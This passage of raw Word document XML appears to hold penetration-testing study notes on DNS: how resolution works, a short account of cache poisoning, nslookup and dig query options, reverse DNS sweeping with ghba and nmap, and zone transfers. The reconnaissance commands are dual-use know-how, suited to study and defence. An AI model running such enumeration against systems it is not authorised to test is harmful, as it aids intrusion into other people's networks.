      <w:r w:rsidR="00DA49F8" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a distributed database used to map IP addresses to hostnames and vice versa</w:t>
      </w:r>
      <w:r w:rsidR="00451D54" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, and provides email routing information</w:t>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DA49F8" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00451D54" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidR="00DA49F8" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> distributes the responsibility of assigning domain names and mapping those names to IP addresses by designating authoritative name servers for each domain. Authoritative name servers are assigned to be responsible for their particular domains, and in turn can assign other authoritative name servers for their sub-domains. </w:t>
      </w:r>
      <w:r w:rsidR="00451D54" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r w:rsidR="00DA49F8" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>also stores other types of information, such as the list of mail servers that accept email for a given Internet domain</w:t>
      </w:r>
      <w:r w:rsidR="00451D54" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451D54" w:rsidRPr="00844A83" w:rsidRDefault="00451D54" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The domain name space consists of a tree of domain names. Each node or leaf in the tree has zero or more resource records, which hold information associated with the domain name. The tree sub-divides into zones beginning at the root zone. A DNS zone consists of a collection of connected nodes authoritatively served by an authoritative nameserver. (Note that a single nameserver can host several zones.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95BCA" w:rsidRPr="00844A83" w:rsidRDefault="00B95BCA" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The client-side of the DNS is called a DNS resolver. It is responsible for initiating and sequencing the queries that ultimately lead to a full resolution (translation) of the resource sought, e.g., translation of a domain name into an IP address. Resolving usually entails iterating through several name servers to find the needed information. However, some resolvers function simplistically and can communicate only with a single name server. These simple resolvers (called "stub resolvers") rely on a recursive name server to perform the work of finding information for them. A DNS query may be either a non-recursive query or a recursive query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95BCA" w:rsidRPr="00844A83" w:rsidRDefault="00B95BCA" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A non-recursive query is one in which the DNS server provides a record for a domain for which it is authoritative itself, or it provides a partial result without querying other servers. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95BCA" w:rsidRPr="00844A83" w:rsidRDefault="00B95BCA" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A recursive query is one for which the DNS server will fully answer the query (or give an error) by querying other name servers as needed. DNS servers are not required to support recursive queries. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95BCA" w:rsidRPr="00844A83" w:rsidRDefault="00B95BCA" w:rsidP="00844A83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The resolver, or another DNS server acting recursively on behalf of the resolver, negotiates use of recursive service using bits in the query headers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00346C01" w:rsidRPr="00844A83" w:rsidRDefault="00346C01" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">An authoritative name server is a name server is a name server that is responsible for a particular zone. An authoritative name server can either be a master server or a slave server. A master server is a server that stores the original (master) copies of all zone records. Every DNS zone must be assigned a set of authoritative name servers that are installed in NS records in the parent zone. An authoritative server indicates its status of supplying definitive answers, deemed authoritative, by setting a software flag (a protocol structure bit), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>called</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Authoritative Answer (AA) bit in its responses. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95BCA" w:rsidRDefault="00B95BCA" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS cache servers store DNS query results for a period of time determined in the configuration (time-to-live) of the domain name record in question. Caching DNS servers implement the recursive algorithm necessary to resolve a given name on behalf of the clients starting with the DNS root through to the authoritative name servers of the queried domain. With this function implemented in the name server, user applications gain efficiency in design and operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00552347" w:rsidRPr="00844A83" w:rsidRDefault="00552347" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS cache poisoning is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">where an attacker spoofs DNS responses </w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">caching name server so it incorrectly revolves IP addresses and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re-direct</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> its users to attacker controlled sites</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bases on allowing external recursive queries and using incremental query IDs + static source ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95BCA" w:rsidRPr="00844A83" w:rsidRDefault="00B95BCA" w:rsidP="00B95BCA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF7E05" w:rsidRPr="00844A83" w:rsidRDefault="00552347" w:rsidP="00EF7E05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00EF7E05" w:rsidRPr="00844A83">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>slookup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</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c:\nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00844A83"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 xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;name/IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>set DNS server to use</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 set querytype=any</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E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>list all record type for domain (MS, SOA, NS)</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 &lt;domain_name&gt;</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t>domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E50EC3" w:rsidRDefault="00E50EC3" w:rsidP="00844A83">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF7E05"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w:t>
      </w:r>
      <w:r w:rsidR="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF7E05" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF7E05" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> debug </w:t>
      </w:r>
      <w:r w:rsidR="00EF7E05"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00EF7E05" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">detailed responses including response flags </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF7E05"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w:t>
      </w:r>
      <w:r w:rsidR="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF7E05" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF7E05" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> norecurse </w:t>
      </w:r>
      <w:r w:rsidR="00EF7E05"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00EF7E05" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">prevent server performing recursive queries </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C3C88" w:rsidRPr="00844A83" w:rsidRDefault="006C3C88" w:rsidP="00EF7E05">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NB. PTR query format: 190.160.68.207.in-addr.arpa.</w:t>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reversed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP address)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF7E05" w:rsidRPr="00844A83" w:rsidRDefault="00EF7E05" w:rsidP="00EF7E05">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF7E05" w:rsidRPr="00844A83" w:rsidRDefault="00844A83" w:rsidP="00EF7E05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00EF7E05" w:rsidRPr="00844A83">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ig</w:t>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</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any</w:t>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>All e.g SOA, NS, MX</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ns</w:t>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>NS servers</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mx</w:t>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>MX records</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-x &lt;ip_address&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00844A83" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>reverse lookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E50EC3" w:rsidRDefault="00E50EC3" w:rsidP="00844A83">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C3C88" w:rsidRPr="00844A83" w:rsidRDefault="006C3C88"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+trace</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Pr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>which servers where queried</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00346C01" w:rsidRPr="00844A83" w:rsidRDefault="006C3C88" w:rsidP="00844A83">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF7E05" w:rsidRPr="00844A83" w:rsidRDefault="00EF7E05" w:rsidP="00346C01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reverse DNS sweeping</w:t>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (can manually set </w:t>
      </w:r>
      <w:r w:rsidR="004575D7" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS server first):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF7E05" w:rsidRPr="00844A83" w:rsidRDefault="00EF7E05" w:rsidP="004575D7">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w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ghba –f &lt;outfile&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004575D7" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004575D7" w:rsidRPr="00844A83" w:rsidRDefault="004575D7" w:rsidP="004575D7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF7E05" w:rsidRPr="00844A83" w:rsidRDefault="00EF7E05" w:rsidP="004575D7">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nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –sL </w:t>
      </w:r>
      <w:r w:rsidR="004575D7" w:rsidRPr="00844A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357924" w:rsidRPr="00844A83" w:rsidRDefault="00357924" w:rsidP="00357924">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>C2b - DNS zone transfers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004575D7" w:rsidRPr="006C3C88" w:rsidRDefault="004575D7" w:rsidP="004575D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3C88">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A DNS zone transfer provides a</w:t>
      </w:r>
      <w:r w:rsidR="006C3C88" w:rsidRPr="006C3C88">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3C88">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for replicating the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR). </w:t>
      </w:r>
      <w:r w:rsidR="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zone transfers should be restricted to known peer servers to prevent entire domain information being </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>expose</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to external parties </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004575D7" w:rsidRPr="006C3C88" w:rsidRDefault="004575D7" w:rsidP="004575D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
